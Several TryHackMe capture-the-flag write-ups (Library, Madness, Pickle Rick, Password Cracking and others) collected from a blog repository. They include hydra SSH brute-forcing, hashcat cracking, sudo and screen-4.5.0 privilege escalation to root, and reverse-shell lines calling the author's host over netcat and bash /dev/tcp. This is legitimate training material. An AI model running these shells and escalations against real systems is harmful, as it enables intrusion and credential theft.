88 | 89 | ![](https://imgur.com/1Dzbs6u.png) 90 | 91 | ![](https://imgur.com/g1MXfqH.png) 92 | 93 | ![](https://imgur.com/f4nDpbE.png) 94 | 95 | Let's decode the hidden message 😊 96 | 97 | ![](https://imgur.com/nlyCJfG.png) 98 | 99 | ``` 100 | Remember that the credentials to the recovery login are hidden on the homepage! 101 | I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S 102 | ``` 103 | 104 | This is just a hint, but we already have the credentials let's use it. 105 | 106 | ![](https://imgur.com/Ovwwmvk.png) 107 | 108 | ![](https://imgur.com/XLSDYwm.png) 109 | 110 | Ok, this is some basic RCE let's use the variable "?cmd" 111 | 112 | ![](https://imgur.com/oarM6xv.png) 113 | 114 | Let's see if thre is something on the /home path 115 | 116 | ![](https://imgur.com/wP495Qk.png) 117 | 118 | ![](https://imgur.com/4WFCneV.png) 119 | 120 | Let's crack the password of the ssh user 'jack' with the given wordlist, we will use hydra. 121 | 122 | ``` 123 | ➜ TryHackMe hydra -l jack -P jack_wordlist.txt 10.10.134.255 -s 80 ssh 124 | ``` 125 | 126 | ![](https://imgur.com/SC7HTrY.png) 127 | 128 | ``` 129 | jack:ITMJpGGIqg1jn?>@ 130 | ``` 131 | 132 | ![](https://imgur.com/DkRwcid.png) 133 | 134 | ### #1 User Flag 135 | 136 | ``` 137 | jack@jack-of-all-trades:~$ python -m SimpleHTTPServer 138 | ``` 139 | 140 | ![](https://imgur.com/OEkFcsG.png) 141 | 142 | ``` 143 | securi-tay2020_{p3ugu1n-hunt3r-3xtr40rd1n41r3} 144 | ``` 145 | 146 | ### #2 Root Flag 147 | 148 | ![](https://imgur.com/wD0wagv.png) 149 | 150 | ![](https://imgur.com/otR1TZZ.png) 151 | 152 | ``` 153 | securi-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a} 154 | ``` 155 | 156 | 157 | -------------------------------------------------------------------------------- /src/content/blog/library-ctf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Library CTF - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-11 5 | description: "Writeup for the Library 
CTF room on TryHackMe" 6 | --- 7 | [TryHackMe | Library CTF](https://tryhackme.com/room/bsidesgtlibrary) 8 | 9 | Read user.txt and root.txt 10 | 11 | --- 12 | 13 | ### Setup 14 | 15 | ``` 16 | ➜ TryHackMe nmap -A -vv 10.10.98.89 17 | ``` 18 | 19 | ``` 20 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 21 | | ssh-hostkey: 22 | | 2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA) 23 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/X/Zd2/Rc7PrxR+K9bGX9i7Imk3JlU274UsMqM6X03THehc6XUvg0URMryl9IldYLjQvD0fadIg1jB8rCxqzRiJi35nw7ICUXnpZryDS/guLb94Sb9IrLWBTNNdUWV7bTb4gMaGHdyQAmKY62FgL2aKUFMn8SpxJu0WiVIQgcKkv15s17rNqVD39kG8x/bfdftcjn/YtEP09Sy4z1FqXF9FT1xWKaVr3Pd5rCAU4rpOzVpS+qTj77NWaXNDlcg3aCRaILD+4lquq8kVAA+VcXR9IwXOTKJRzRCMfYwd3M6QC45LlRa17xvhI++vBtCcGwxuD9JZsXu0Cd/5fdisrl 24 | | 256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA) 25 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI8Oi4FyiWylek0a1n1TD1/TBOi2uXVPfqoSo1C56D1rJlv4g2g6SDJjW29bhodoVO6W8VdWNQGiyJ5QW2XirHI= 26 | | 256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519) 27 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOPQQrT4KT/PF+8i33LGgs0c83MQL1m863niSGsBDfCN 28 | 29 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) 30 | | http-methods: 31 | |_ Supported Methods: GET HEAD POST OPTIONS 32 | | http-robots.txt: 1 disallowed entry 33 | |_/ 34 | |_http-server-header: Apache/2.4.18 (Ubuntu) 35 | |_http-title: Welcome to Blog - Library Machine 36 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 37 | ``` 38 | 39 | ![](https://imgur.com/NWlX0nd.png) 40 | 41 | Let's see if there is some hidden directory 😔 42 | 43 | ``` 44 | ➜ ~ dirb http://10.10.98.89/ 45 | 46 | ----------------- 47 | DIRB v2.22 48 | By The Dark Raver 49 | ----------------- 50 | 51 | START_TIME: Tue Jun 9 16:57:31 2020 52 | URL_BASE: http://10.10.98.89/ 53 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 54 | 55 | ----------------- 56 | 57 | GENERATED 
WORDS: 4612 58 | 59 | ---- Scanning URL: http://10.10.98.89/ ---- 60 | ==> DIRECTORY: http://10.10.98.89/images/ 61 | + http://10.10.98.89/index.html (CODE:200|SIZE:5439) 62 | + http://10.10.98.89/robots.txt (CODE:200|SIZE:33) 63 | + http://10.10.98.89/server-status (CODE:403|SIZE:299) 64 | ``` 65 | 66 | ![](https://imgur.com/R4JWXDR.png) 67 | 68 | ![](https://imgur.com/oY8Ps8x.png) 69 | 70 | "Posted by meliodas" maybe a username ? let's keep it.. 71 | 72 | There is nothing on the website, this is a simple landing page with HTML nothing to attack there, but there is something interresting on the "robots.txt" the "User-agent: Rockyou". 73 | 74 | Let's try to crack the ssh password with Hydra 🥰 75 | 76 | ``` 77 | # Meliodas was the name that we found on the index.html and rockyou is a list of common password 78 | ➜ TryHackMe hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.98.89 79 | ``` 80 | 81 | ![](https://imgur.com/ZMBdybW.png) 82 | 83 | ``` 84 | [22][ssh] host: 10.10.98.89 login: meliodas password: iloveyou1 85 | ``` 86 | 87 | ### #1 user.txt 88 | 89 | ![](https://imgur.com/i4x8ElV.png) 90 | 91 | ``` 92 | meliodas@ubuntu:~$ cat user.txt 93 | 6d488cbb3f111d135722c33cb635f4ec 94 | ``` 95 | 96 | ### #2 root.txt 97 | 98 | ``` 99 | meliodas@ubuntu:~$ sudo -l 100 | Matching Defaults entries for meliodas on ubuntu: 101 | env_reset, mail_badpass, 102 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 103 | 104 | User meliodas may run the following commands on ubuntu: 105 | (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py 106 | ``` 107 | 108 | ``` 109 | meliodas@ubuntu:~$ cat bak.py 110 | #!/usr/bin/env python 111 | import os 112 | import zipfile 113 | 114 | def zipdir(path, ziph): 115 | for root, dirs, files in os.walk(path): 116 | for file in files: 117 | ziph.write(os.path.join(root, file)) 118 | 119 | if __name__ == '__main__': 120 | zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', 
zipfile.ZIP_DEFLATED) 121 | zipdir('/var/www/html', zipf) 122 | zipf.close() 123 | ``` 124 | 125 | Ok now, we know that we can execute a python script with the root privileges let's try to have a root shell and run it with sudo 🤓 126 | 127 | ``` 128 | meliodas@ubuntu:~$ echo 'nc -e /bin/sh 10.9.2.228 4444' > bak.py 129 | -bash: bak.py: Permission denied 130 | ``` 131 | 132 | Well.. That doesn't work let's try something else.. 133 | 134 | In the sudo -l output we can see the path of the file, "/home/meliodas/bak.py". We can't write to the file itself, but it sits in meliodas's own home directory, and deleting or creating a file only needs write permission on the directory, so the sudo rule points at a path the unprivileged user controls. 135 | 136 | Let's delete it and recreate our own one 🤑 137 | 138 | ``` 139 | meliodas@ubuntu:~$ rm -rf /home/meliodas/bak.py 140 | ``` 141 | 142 | ``` 143 | meliodas@ubuntu:~$ echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py 144 | meliodas@ubuntu:~$ sudo python /home/meliodas/bak.py 145 | $ id 146 | uid=0(root) gid=0(root) groups=0(root) 147 | $ cd /root/ 148 | $ ls 149 | root.txt 150 | $ cat root.txt 151 | e8c8c6c256c35515d1d344ee0488c617 152 | ``` 153 | 154 | 155 | -------------------------------------------------------------------------------- /src/content/blog/madness.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Madness - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-15 5 | description: "Writeup for the Madness room on TryHackMe" 6 | --- 7 | [TryHackMe | Madness](https://tryhackme.com/room/madness) 8 | 9 | ![https://i.imgur.com/5iW7kC8.jpg](https://i.imgur.com/5iW7kC8.jpg) 10 | 11 | Please note this challenge does not require SSH brute forcing. 12 | 13 | Use your skills to access the user and root account!
14 | 15 | This room is part of the Turmoil series 16 | 17 | ### Setup 18 | 19 | ``` 20 | ➜ TryHackMe nmap -A -vv 10.10.52.214 21 | ``` 22 | 23 | ``` 24 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 25 | | ssh-hostkey: 26 | | 2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA) 27 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnNdHQKU4ZvpWn7Amdx7LPhuwUsHY8p1O8msRAEkaIGcDzlla2FxdlnCnS1h+A84lzn1oubZyb5vMrPM8T2IsxoSU2gcbbgfq/3giAL+hmuKm/nD43OKRflSHlcpIVgwQOVRdEfbQSOVpV5VBtJziA1Xu2dts2WWtawDS93CBtlfyeh+BuxZvBPX2k8XPWwykyR6cWbdGz1AAx6oxNRvNShJ99c9Vs7FW6bogwLAe9SWsFi2oB7ti6M/OH1qxgy7ZPQFhItvI4Vz2zZFGVEltL1fkwk2dat8yfFNWwm6+/cMTJqbVb7MPt3jc9QpmJmpgwyWuy4FTNgFt9GKNOJU6N 28 | | 256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA) 29 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGMMalsXVdAFj+Iu4tESrnvI/5V64b4toSG7PK2N/XPqOe3q3z5OaDTK6TWo0ezdamfDPem/UO9WesVBxmJXDkE= 30 | | 256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519) 31 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB3zGVeEQDBVK50Tz0eNWzBJny6ddQfBb3wmmG3QtMAQ 32 | 33 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) 34 | | http-methods: 35 | |_ Supported Methods: HEAD POST OPTIONS 36 | |_http-server-header: Apache/2.4.18 (Ubuntu) 37 | |_http-title: Apache2 Ubuntu Default Page: It works 38 | ``` 39 | 40 | ### #1 user.txt 41 | 42 | ![](https://imgur.com/41PScB3.png) 43 | 44 | On the website in the source code we can see "They will never find me" let's wget the image and search if there is anything in there. 45 | 46 | Once you open the image an error will show up, we need to convert the header image to a jpg file 47 | 48 | ![](https://imgur.com/zdz5gC1.png) 49 | 50 | ``` 51 | change the first line to this 52 | ``` 53 | 54 | ![](https://imgur.com/PklK0ei.png) 55 | 56 | Save the hex file and open the image to seethe result ! 57 | 58 | ![](https://imgur.com/GrcsvaS.png) 59 | 60 | Nice we have a hidden directory ! 
61 | 62 | ![](https://imgur.com/01jTS9C.png) 63 | 64 | ![](https://imgur.com/9D3EgD5.png) 65 | 66 | Now we have plenty of ways to solve this puzzle; I chose the simplest one 67 | 68 | I created a list with python 69 | 70 | ``` 71 | >>> range(100) 72 | [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99] 73 | ``` 74 | 75 | Then a imported this list in burp suite and I started the attack ! 76 | 77 | ![](https://imgur.com/ABpS7HJ.png) 78 | 79 | Now we can extract some files on the "thm.jpg" image from the apache website. 80 | 81 | ``` 82 | ➜ TryHackMe steghide extract -sf thm.jpg 83 | Enter passphrase: 84 | the file "hidden.txt" does already exist. overwrite ? (y/n) y 85 | wrote extracted data to "hidden.txt". 86 | 87 | ➜ TryHackMe cat hidden.txt 88 | Fine you found the password! 89 | 90 | Here's a username 91 | 92 | wbxre 93 | 94 | I didn't say I would make it easy for you! 95 | ``` 96 | 97 | After reading the hint given by TryHackMe 98 | 99 | ``` 100 | There's something ROTten about this guys name! 101 | ``` 102 | 103 | I tried to decode the username using the ROT13 algo 104 | 105 | ![](https://imgur.com/Qn5keAi.png) 106 | 107 | And it worked !! Let's ssh the server now with the username and password 108 | 109 | ``` 110 | ssh joker@ip 111 | password : y2RPJ4QaPF!B 112 | ``` 113 | 114 | Aaaannd it's not working for some reason.. After some time I tried the image on the room 115 | 116 | ![](https://imgur.com/P13mnW4.png) 117 | 118 | ``` 119 | ➜ TryHackMe steghide extract -sf 5iW7kC8.jpg 120 | Enter passphrase: 121 | the file "password.txt" does already exist. overwrite ? (y/n) y 122 | wrote extracted data to "password.txt".
123 | 124 | ➜ TryHackMe cat password.txt 125 | I didn't think you'd find me! Congratulations! 126 | 127 | Here take my password 128 | 129 | "*axA&GF8dP" 130 | ``` 131 | 132 | ``` 133 | ➜ TryHackMe ssh joker@10.10.52.214 134 | joker@10.10.52.214's password: "*axA&GF8dP" 135 | Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-170-generic x86_64) 136 | 137 | * Documentation: https://help.ubuntu.com 138 | * Management: https://landscape.canonical.com 139 | * Support: https://ubuntu.com/advantage 140 | 141 | Last login: Thu May 14 15:00:54 2020 from 10.9.2.228 142 | joker@ubuntu:~$ ls 143 | user.txt 144 | joker@ubuntu:~$ cat user.txt 145 | THM{d5781e53b130efe2f94f9b0354a5e4ea} 146 | ``` 147 | 148 | ### #2 root.txt 149 | 150 | Now let's get a root access ! :D 151 | 152 | ``` 153 | joker@ubuntu:~$ sudo -l 154 | [sudo] password for joker: 155 | Sorry, user joker may not run sudo on ubuntu. 156 | # Nothing to do with sudo :/ 157 | ``` 158 | 159 | ``` 160 | joker@ubuntu:~$ find /bin -perm -4000 161 | /bin/fusermount 162 | /bin/su 163 | /bin/ping6 164 | "/bin/screen-4.5.0" 165 | /bin/screen-4.5.0.old 166 | /bin/mount 167 | /bin/ping 168 | /bin/umount 169 | joker@ubuntu:~$ 170 | ``` 171 | 172 | [Offensive Security's Exploit Database Archive](https://www.exploit-db.com/exploits/41154) 173 | 174 | ``` 175 | joker@ubuntu:~$ bash s.sh 176 | ~ gnu/screenroot ~ 177 | [+] First, we create our shell and library... 
178 | /tmp/libhax.c: In function ‘dropshell’: 179 | /tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration] 180 | chmod("/tmp/rootshell", 04755); 181 | ^ 182 | /tmp/rootshell.c: In function ‘main’: 183 | /tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration] 184 | setuid(0); 185 | ^ 186 | /tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration] 187 | setgid(0); 188 | ^ 189 | /tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration] 190 | seteuid(0); 191 | ^ 192 | /tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration] 193 | setegid(0); 194 | ^ 195 | /tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration] 196 | execvp("/bin/sh", NULL, NULL); 197 | ^ 198 | /usr/bin/ld: cannot open output file /tmp/rootshell: Permission denied 199 | collect2: error: ld returned 1 exit status 200 | [+] Now we create our /etc/ld.so.preload file... 201 | [+] Triggering... 202 | ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. 203 | [+] done! 204 | No Sockets found in /tmp/screens/S-joker. 
205 | 206 | $ id 207 | uid=0(root) gid=0(root) groups=0(root),1000(joker) 208 | $ cd /root/ 209 | $ ls 210 | root.txt 211 | $ cat root.txt 212 | THM{5ecd98aa66a6abb670184d7547c8124a} 213 | ``` 214 | 215 | 216 | -------------------------------------------------------------------------------- /src/content/blog/ninja-skills.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Ninja Skills - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-28 5 | description: "Writeup for the Ninja Skills on TryHackMe" 6 | --- 7 | [TryHackMe | Ninja Skills](https://tryhackme.com/room/ninjaskills) 8 | 9 | ![](https://i.imgur.com/JbCoSfv.png) 10 | 11 | Let's have some fun with Linux. Deploy the machine and get started. 12 | 13 | **This machine may take up to 3 minutes to configure.** 14 | 15 | (If you prefer to SSH into the machine, use the credentials new-user as the username and password) 16 | 17 | Answer the questions about the following files: 18 | 19 | - 8V2L 20 | - bny0 21 | - c4ZX 22 | - D8B3 23 | - FHl1 24 | - oiMO 25 | - PFbD 26 | - rmfX 27 | - SRSq 28 | - uqyw 29 | - v2Vb 30 | - X1Uy 31 | 32 | The aim is to answer the questions as efficiently as possible. 33 | 34 | ### #1 Which of the above files are owned by the best-group group(enter the answer separated by spaces in alphabetical order) 35 | 36 | ``` 37 | [new-user@ip-10-10-208-44 ~]$ find / -group best-group 2>/dev/null 38 | /mnt/D8B3 39 | /home/v2Vb 40 | ``` 41 | 42 | ### #2 Which of these files contain an IP address? 
43 | 44 | [RegEx: Find IP Addresses in a File Using Grep - ShellHacks](https://www.shellhacks.com/regex-find-ip-addresses-file-grep/) 45 | 46 | ``` 47 | find / -type f -name "8V2L" 2>/dev/null 48 | ``` 49 | 50 | ``` 51 | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" * 52 | ``` 53 | 54 | ``` 55 | [new-user@ip-10-10-208-44 ~]$ find / -type f -name "oiMO" 2>/dev/null 56 | /opt/oiMO 57 | [new-user@ip-10-10-208-44 ssh]$ cd /opt/ 58 | [new-user@ip-10-10-208-44 opt]$ grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" oiMO 59 | 1.1.1.1 60 | ``` 61 | 62 | ### #3 Which file has the SHA1 hash of 9d54da7584015647ba052173b84d45e8007eba94 63 | 64 | [Search file with known sha1 sum](https://askubuntu.com/questions/932694/search-file-with-known-sha1-sum) 65 | 66 | ``` 67 | for f in *; do echo '9d54da7584015647ba052173b84d45e8007eba94 '$f | sha1sum -c; done | grep OK 68 | ``` 69 | 70 | ``` 71 | [new-user@ip-10-10-208-44 ssh]$ find / -type f -name "D8B3" 2>/dev/null 72 | /mnt/D8B3 73 | [new-user@ip-10-10-208-44 ssh]$ cd /mnt/ 74 | [new-user@ip-10-10-208-44 mnt]$ for f in *; do echo '9d54da7584015647ba052173b84d45e8007eba94 '$f | sha1sum -c; done | grep OK 75 | c4ZX: OK 76 | ``` 77 | 78 | ### #4 Which file contains 230 lines? 79 | 80 | ``` 81 | wc -l * | grep 230 82 | ``` 83 | 84 | ``` 85 | bny0 86 | ``` 87 | 88 | ### #5 Which file's owner has an ID of 502? 89 | 90 | ``` 91 | [new-user@ip-10-10-208-44 /]$ find / -type f -name "X1Uy" 2>/dev/null 92 | /X1Uy 93 | [new-user@ip-10-10-208-44 /]$ cd / 94 | [new-user@ip-10-10-208-44 /]$ ls -n 95 | -rw-rw-r-- 1 "502" 501 13545 Oct 23 2019 X1Uy 96 | ``` 97 | 98 | ### #6 Which file is executable by everyone? 
99 | 100 | ``` 101 | [new-user@ip-10-10-208-44 ssh]$ find / -type f -name "8V2L" 2>/dev/null 102 | /etc/8V2L 103 | [new-user@ip-10-10-208-44 ssh]$ cd /etc/ 104 | [new-user@ip-10-10-208-44 etc]$ ls -la 105 | total 1400 106 | drwxr-xr-x 78 root root 4096 May 28 16:18 . 107 | dr-xr-xr-x 25 root root 4096 May 28 16:18 .. 108 | -rwxrwxr-x 1 new-user new-user 13545 Oct 23 2019 8V2L 109 | ``` 110 | 111 | 112 | -------------------------------------------------------------------------------- /src/content/blog/o5YDmWb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/blog/o5YDmWb.png -------------------------------------------------------------------------------- /src/content/blog/password-cracking.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Password Cracking - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-04 5 | description: "Writeup for the Password Cracking room on TryHackMe" 6 | --- 7 | [TryHackMe | Password Cracking](https://tryhackme.com/room/passwordcracking) 8 | 9 | This section you will need to use Hashcat to **bruteforce** the hash by using the given **password format**. 10 | 11 | --- 12 | 13 | ### #1 Password format: "TRY-HACK-ME-" followed by 3 digits. 14 | 15 | [Hashcat Tutorial - The basics of cracking passwords with hashcat - Laconic Wolf](https://laconicwolf.com/2018/09/29/hashcat-tutorial-the-basics-of-cracking-passwords-with-hashcat/) 16 | 17 | ``` 18 | hashcat -a 3 -m 0 md5bop.txt "TRY-HACK-ME-?d?d?d" --force 19 | ``` 20 | 21 | ``` 22 | eedb694a362f8ab2effbad5e4c8fa095:TRY-HACK-ME-452 23 | ``` 24 | 25 | ### #2 Password format: "TRY-HACK-ME-" followed by 4 digits. 
26 | 27 | ``` 28 | hashcat -a 3 -m 0 md5bop.txt "TRY-HACK-ME-?d?d?d?d" --force 29 | ``` 30 | 31 | ``` 32 | 19b489d1c4220946b38d65a7fce24372:TRY-HACK-ME-7163 33 | ``` 34 | 35 | ### #3 Password format: "TRY-HACK-ME-" followed by 5 digits. 36 | 37 | ``` 38 | hashcat -a 3 -m 0 md5bop.txt "TRY-HACK-ME-?d?d?d?d?d" --force 39 | ``` 40 | 41 | ``` 42 | 7353d3b528592ecd12139fba62c43287:TRY-HACK-ME-54350 43 | ``` 44 | 45 | --- 46 | 47 | In this section you will need to create wordlists and combine them, then use combination attacks in **hashcat**. To generate every digit string of length n, check out **crunch**. For combining wordlists, check out **combinator** from hashcat-utils. 48 | 49 | Here are the wordlists you need for all the questions. 50 | 51 | ### #1 Password format: a united states city followed by 2 digits (all lowercase). 52 | 53 | ``` 54 | hashcat -a 6 -m 0 combi-md5.txt us-city.txt "?d?d" --force 55 | ``` 56 | 57 | ``` 58 | 0f8e6ad80411e27fc85ba1f79153dd8f:pennsylvania46 59 | ``` 60 | 61 | ### #2 Password format: a united states city followed by a simple color, followed by 3 digits (all lowercase). 
62 | 63 | [How To Perform a Combinator Attack Using Hashcat](https://www.4armed.com/blog/hashcat-combinator-attack/) 64 | 65 | ``` 66 | # Since this challenge needs two wordlists merged into one, let's use combinator (hashcat utils) 67 | /usr/share/hashcat-utils/combinator.bin us-city.txt color.txt > combi-city-color.txt 68 | ``` 69 | 70 | ``` 71 | hashcat -a 6 -m 0 combi-md5.txt combi-city-color.txt "?d?d?d" --force 72 | ``` 73 | 74 | ``` 75 | fbd527693aceda78b30a978d7d3b9abb:phoenixpurple585 76 | ``` 77 | 78 | ### #3 Password format: a simple color followed by a country, followed by 4 digits (all lowercase). Hash: a4131ef4610be60c0c6a3656b00dd763 79 | 80 | ``` 81 | /usr/share/hashcat-utils/combinator.bin color.txt contry.txt > combi-color-country.txt 82 | ``` 83 | 84 | ``` 85 | hashcat -a 6 -m 0 combi-md5.txt combi-color-country.txt "?d?d?d?d" --force 86 | ``` 87 | 88 | ``` 89 | a4131ef4610be60c0c6a3656b00dd763:blueiceland7926 90 | ``` 91 | 92 | --- 93 | 94 | In this section you will learn how to use **rainbow tables** to crack hashes. The rainbow table (**the XP special table is enough to crack all the hashes**) can be found **[here](http://ophcrack.sourceforge.net/tables.php)**; you will need to use **[Ophcrack](http://ophcrack.sourceforge.net/download.php)** to load the table and crack the hashes. 
95 | 96 | ![](https://imgur.com/zS0lftk.png) 97 | 98 | [Ophcrack](https://ophcrack.sourceforge.io/tables.php) 99 | 100 | ### #1 101 | 102 | ``` 103 | ?+$!^W@?+$!^W@NTLMForTheWin 104 | ``` 105 | 106 | ### #2 107 | 108 | ``` 109 | WinP@$$w0rd3Z 110 | ``` 111 | 112 | ### #3 113 | 114 | ``` 115 | ]?+$!^W@ 116 | ``` 117 | 118 | 119 | -------------------------------------------------------------------------------- /src/content/blog/pickle-rick-ctf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Pickle Rick CTF - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-19 5 | description: "Writeup for the Pickle Rick CTF on TryHackMe" 6 | --- 7 | [TryHackMe | Pickle Rick CTF](https://tryhackme.com/room/picklerick) 8 | 9 | This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle. 10 | 11 | ### Setup 12 | 13 | ![](https://imgur.com/rM9j9mn.png) 14 | 15 | ``` 16 | Note to self, remember username! 17 | 18 | Username: R1ckRul3s 19 | ``` 20 | 21 | ![](https://imgur.com/lUU7tXN.png) 22 | 23 | ``` 24 | Maybe a password ? 25 | Wubbalubbadubdub 26 | ``` 27 | 28 | ![](https://imgur.com/xtHHGaE.png) 29 | 30 | ``` 31 | Account: 32 | R1ckRul3s:Wubbalubbadubdub 33 | ``` 34 | 35 | ### #1 Deploy the virtual machine on this task and explore the web application. What is the first ingredient Rick needs? 36 | 37 | ![](https://imgur.com/1vWZUA9.png) 38 | 39 | ``` 40 | cat Sup3rS3cretPickl3Ingred.txt 41 | ``` 42 | 43 | ![](https://imgur.com/J5cZERN.png) 44 | 45 | Let's try something else then ... 
46 | 47 | [bash | GTFOBins](https://gtfobins.github.io/gtfobins/bash/) 48 | 49 | ``` 50 | bash -c 'exec bash -i &>/dev/tcp/10.9.2.228/4444 <&1' 51 | ``` 52 | 53 | ``` 54 | www-data@ip-10-10-91-207:/var/www/html$ ls 55 | ls 56 | Sup3rS3cretPickl3Ingred.txt 57 | assets 58 | clue.txt 59 | denied.php 60 | index.html 61 | login.php 62 | portal.php 63 | robots.txt 64 | www-data@ip-10-10-91-207:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt 65 | cat Sup3rS3cretPickl3Ingred.txt 66 | mr. meeseek hair 67 | ``` 68 | 69 | ### #2 Whats the second ingredient Rick needs? 70 | 71 | When you are in root you can't cd in the directory so I used the less command like so. 72 | 73 | ``` 74 | less /home/rick/"second ingredients" 75 | 1 jerry tear 76 | ``` 77 | 78 | ### #3 Whats the final ingredient Rick needs? 79 | 80 | ``` 81 | www-data@ip-10-10-91-207:/var/www/html$ sudo -l 82 | Matching Defaults entries for www-data on 83 | ip-10-10-91-207.eu-west-1.compute.internal: 84 | env_reset, mail_badpass, 85 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 86 | 87 | User www-data may run the following commands on 88 | ip-10-10-91-207.eu-west-1.compute.internal: 89 | (ALL) NOPASSWD: ALL 90 | www-data@ip-10-10-91-207:/var/www/html$ sudo su 91 | cd /root/ 92 | ls 93 | 3rd.txt 94 | snap 95 | cat 3rd.txt 96 | 3rd ingredients: fleeb juice 97 | ``` 98 | 99 | 100 | -------------------------------------------------------------------------------- /src/content/blog/rp-web-scanning.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "RP Web Scanning - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-19 5 | description: "Writeup for the RP Web Scanning challenge" 6 | --- 7 | [TryHackMe | RP: Web Scanning](https://tryhackme.com/room/rpwebscanning) 8 | 9 | A short quiz over the various switches used with Nikto as well as a quick scan against our target. All you'll need for this is the help menu for nikto. 
Include all parts of the switch unless otherwise specified. 10 | 11 | --- 12 | 13 | ### #1 First and foremost, what switch do we use to set the target host? 14 | 15 | ``` 16 | -h 17 | ``` 18 | 19 | ![](https://imgur.com/PSZSL2E.png) 20 | 21 | ### #2 Websites don't always properly redirect to their secure transport port and can sometimes have different issues depending on the manner in which they are scanned. How do we disable secure transport? 22 | 23 | ``` 24 | -nossl 25 | ``` 26 | 27 | ![](https://imgur.com/uv9VtgE.png) 28 | 29 | ### #3 How about the opposite, how do we force secure transport? 30 | 31 | ``` 32 | -ssl 33 | ``` 34 | 35 | ![](https://imgur.com/onlbrJL.png) 36 | 37 | ### #4 What if we want to set a specific port to scan? 38 | 39 | ``` 40 | -p 41 | ``` 42 | 43 | ![](https://imgur.com/BWc33ta.png) 44 | 45 | ### #5 As the web is constantly evolving, so is Nikto. A database of 46 | 47 | vulnerabilities represents a core component to this web scanner, how do 48 | we verify that this database is working and free from error? 49 | 50 | ``` 51 | -dbcheck 52 | ``` 53 | 54 | ![](https://imgur.com/MCdgB7b.png) 55 